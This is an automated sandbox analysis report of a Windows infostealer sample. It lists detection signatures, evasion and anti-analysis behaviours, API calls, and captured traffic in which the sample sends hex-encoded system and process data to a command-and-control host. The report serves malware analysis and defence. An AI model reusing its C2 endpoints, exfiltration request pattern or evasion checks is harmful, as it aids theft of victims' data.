Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dZsdMl5Pwl.exe

Overview

General Information

Sample name:dZsdMl5Pwl.exe
renamed because original name is a hash value
Original sample name:efd7bbaba8aa8e6865430d1ffcfbf2d5.exe
Analysis ID:1581393
MD5:efd7bbaba8aa8e6865430d1ffcfbf2d5
SHA1:a9c1b894dc0628909524f21c2b8da3d80d4d1725
SHA256:044837966b88050aafba12d5765a42768de8b1b55cd83a274df9a0fcf17fede2
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • dZsdMl5Pwl.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\dZsdMl5Pwl.exe" MD5: EFD7BBABA8AA8E6865430D1FFCFBF2D5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: dZsdMl5Pwl.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: dZsdMl5Pwl.exeReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: dZsdMl5Pwl.exeJoe Sandbox ML: detected
Source: dZsdMl5Pwl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_009EA5B0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_009EB560
Source: dZsdMl5Pwl.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0098255D
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009829FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 561895Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 37 39 31 38 32 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4A8C0 recvfrom,0_2_00A4A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 561895Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 37 39 31 38 32 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:54:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:54:22 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: dZsdMl5Pwl.exe, 00000000.00000003.2466035923.0000000001BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480706350.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480706350.0000000001B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480706350.0000000001B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480814044.0000000001B53000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2465756327.0000000001B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: dZsdMl5Pwl.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: dZsdMl5Pwl.exe, dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443

System Summary

barindex
PE file contains section with special chars
Source: dZsdMl5Pwl.exeStatic PE information: section name:
Source: dZsdMl5Pwl.exeStatic PE information: section name: .idata
Source: dZsdMl5Pwl.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009905B00_2_009905B0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00996FA00_2_00996FA0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4B1800_2_00A4B180
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009BF1000_2_009BF100
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A500E00_2_00A500E0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D0E0500_2_00D0E050
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D0A0000_2_00D0A000
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009E62100_2_009E6210
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4C3200_2_00A4C320
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A504200_2_00A50420
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CD44100_2_00CD4410
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098E6200_2_0098E620
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D047800_2_00D04780
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009EA7F00_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4C7700_2_00A4C770
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CE67300_2_00CE6730
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A3C9000_2_00A3C900
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009949400_2_00994940
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098A9600_2_0098A960
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00C3AAC00_2_00C3AAC0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00B56AC00_2_00B56AC0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098CBB00_2_0098CBB0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CF8BF00_2_00CF8BF0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00B14B600_2_00B14B60
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00C3AB2C0_2_00C3AB2C
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D0CC900_2_00D0CC90
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CFCD800_2_00CFCD80
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D04D400_2_00D04D40
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00C9AE300_2_00C9AE30
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4EF900_2_00A4EF90
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A48F900_2_00A48F90
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CD2F900_2_00CD2F90
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009A4F700_2_009A4F70
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009910E60_2_009910E6
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CED4300_2_00CED430
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CF35B00_2_00CF35B0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CD56D00_2_00CD56D0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D117A00_2_00D117A0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A398800_2_00A39880
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CD99200_2_00CD9920
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 0099CCD0 appears 53 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 0098CAA0 appears 62 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009871E0 appears 43 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 0099CD40 appears 68 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009C50A0 appears 86 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 00A644A0 appears 59 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 00B5CBC0 appears 93 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009C5340 appears 41 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009C4F40 appears 295 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009C4FD0 appears 220 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009875A0 appears 600 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 00B37220 appears 86 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009873F0 appears 102 times
Source: dZsdMl5Pwl.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: dZsdMl5Pwl.exeStatic PE information: Section: sqttxtfh ZLIB complexity 0.9945883961905421
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0098255D
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009829FF
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: dZsdMl5Pwl.exeReversingLabs: Detection: 52%
Source: dZsdMl5Pwl.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: dZsdMl5Pwl.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: winmm.dllJump to behavior
